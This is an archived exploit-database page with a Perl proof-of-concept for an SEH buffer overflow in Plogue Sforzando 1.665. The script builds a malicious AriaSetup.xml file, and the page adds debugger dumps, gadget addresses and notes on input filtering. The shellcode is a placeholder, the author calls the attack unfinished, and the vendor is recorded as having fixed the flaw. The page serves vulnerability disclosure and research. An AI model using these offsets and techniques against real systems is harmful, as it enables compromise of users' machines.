what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Plogue Sforzando 1.665 Buffer Overflow

Plogue Sforzando 1.665 Buffer Overflow
Posted Nov 12, 2013
Authored by Mike Czumak

Plogue Sforzando version 1.665 SEH buffer overflow proof of concept exploit.

tags | exploit, overflow, proof of concept
SHA-256 | 5030ed687af9d04851f73881c1da274f56fa8d602554018f4dbaa86bbdcd6d32

Plogue Sforzando 1.665 Buffer Overflow

Change Mirror Download
#!/usr/bin/perl

##########################################################################################
# Exploit Title: Plogue Sforzando v1.665 Buffer Overflow POC
# Date Discovered: 10-29-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: Sforzando v1.665
# Software Link: https://www.softpedia.com/dyn-postdownload.php?p=227357&t=0&i=1
# Vendor site: https://www.plogue.com/downloads/
# Version: 1.665
# Tested On: Windows XP SP3
##########################################################################################
# Timeline
# - 10-29: Vuln discovered, vendor contacted
# - 10-30: Vendor acknowleged receipt of bug report
# - 10-31: Vendor applied fix to software installers
##########################################################################################
# At first glance this seems to be a straightforward SEH BOF however it's not the case
# largely due to the way the application treats non-ASCII input (see notes after POC code)
# Refer to the notes at the end of POC code for more details
##########################################################################################


# The application loads the AriaSetup.xml file at launch and reads the product value
# By changing these values we can generate a BOF as follows

my $buffsize = 15000; # sets buffer size for consistent sized payload

# build the start of the xml file
my $header = '<?xml version="1.0" ?><Key>key</Key><AriaSetup version="1665">';
$header = $header . '<Property name="vendor" value="Plogue Art et Technologie, Inc"/>';
$header = $header . '<Property name="product" value="';

my $junk = "\x41" x 392; # 392 is the offset of next seh followed by 4920 bytes of controllable data
my $nseh = "\x42\x42\x42\x42"; # overwrite next seh
my $seh = "\x43\x43\x43\x43"; # overwrite seh (and EIP, offset 396)
my $shell = "\x45" x 5000; # placeholder for shell code; also accessible via ESP+2500 (length 4916)

my $sploit = $junk.$nseh.$seh.$nops.$shell; # assemble exploit portion of buffer
my $fill = "\x46" x ($buffsize - (length($header)+length($sploit))); # fill remainder of buffer
my $buffer = $header.$sploit.$fill; # construct the final buffer

# write the exploit buffer to file
my $file = "AriaSetup.xml";
open(FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($buffer) . "\n";


#############################################
#------------------- NOTES------------------#
#############################################

# after the above POC, seh chain looks like this:

# Address SE handler
# 0012E31C ntdll.7C9032BC
# 0012ECC4 43434343
# 42424242 *** CORRUPT ENTRY ***

# And the stack...
# ...
# 0012ECB0 41414141 AAAA
# 0012ECB4 41414141 AAAA
# 0012ECB8 41414141 AAAA
# 0012ECBC 41414141 AAAA
# 0012ECC0 41414141 AAAA
# 0012ECC4 42424242 BBBB Pointer to next SEH record
# 0012ECC8 43434343 CCCC SE handler
# 0012ECCC 44444444 DDDD
# 0012ECD0 44444444 DDDD
# 0012ECD4 44444444 DDDD
# 0012ECE0 44444444 DDDD
# 0012ECE4 44444444 DDDD
# ...

# And the registers...

# EAX 00000000
# ECX 43434343
# EDX 7C9032BC ntdll.7C9032BC
# EBX 00000000
# ESP 0012E308
# EBP 0012E328
# ESI 00000000
# EDI 00000000
# EIP 43434343

# So, next SEH is overwritten at offset 392, SEH (and EIP) at 396
# and there is plenty of room directly following for shellcode

# The problem that we have for an SEH BOF are the available pop/pop/ret and the input sanitization performed by the application
# Here are the 14 available pop/pop/ret found by mona (using -all switch)

# 0x72d11f39 : pop edi pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d1170b : pop esi pop ebx ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d1204e : pop esi pop ebx ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d115b8 : pop ebx pop ebp ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d1263d : pop edi pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d1269c : pop edi pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x00280b0b : call dword ptr ss:[ebp+30] | startnull,ascii {PAGE_READONLY}
# 0x72d119de : pop esi pop ebp ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d11225 : pop edi pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d1283f : pop eax pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d12899 : pop eax pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d128f3 : pop eax pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d12956 : pop eax pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d12ebe : pop ebx pop ebp ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d12f35 : pop ebx pop ebp ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)

# The application only accepts certain characters as input, limited primarily to the ASCII character set, with some exceptions:
#
# All ASCII characters \x0a through \x7f appear to be accepted as-is except as follows:
# - \x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x26 -- these are stripped entirely
# - \x22 appears to be processed as a double quote and terminates the remainder of the xml string input
# - \x0a is replaced with \x0d

# Anything outside of the ASCII range appears to be stripped (or sometimes replaced)
# This poses a problem when trying to find a usable address for our overwrites

# For example, given the pop/pop/ret addresses found, we would need to include \xd1

# If we try to overwrite SEH with the the address 0x72d11225 (\x25\x12\xd1\x72) we get this:

# 0012ECBC 41414141 AAAA
# 0012ECC0 41414141 AAAA
# 0012ECC4 42424242 BBBB Pointer to next SEH record
# 0012ECC8 44721225 %%%D SE handler
# 0012ECCC 44444444 DDDD
# 0012ECD0 44444444 DDDD

# Notice how \xd1 is stripped (and our trailing input shifted).
# Through a bit of basic trial and error I noticed that you can
# force the application to retain input chars by appending other chars to it.
# For example to maintain \xd1 we can append \xa9 to it

# An SEH overwrite of \x25\x12\xd1\xa9\x72 would result in:

# 0012ECBC 41414141 AAAA
# 0012ECC0 41414141 AAAA
# 0012ECC4 42424242 BBBB Pointer to next SEH record
# 0012ECC8 A9D11225 %%%% SE handler
# 0012ECCC 44444472 rDDD
# 0012ECD0 44444444 DDDD

# This time \xd1 is maintained but unfortunately, the app also maintains the appended \xa9 byte
# which makes this approach innefective for addressing (but possibly useful for shellcode)

# I didn't have the time to investigate this any further but I figured I'd post this POC
# in case someone else wants to give it a go

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close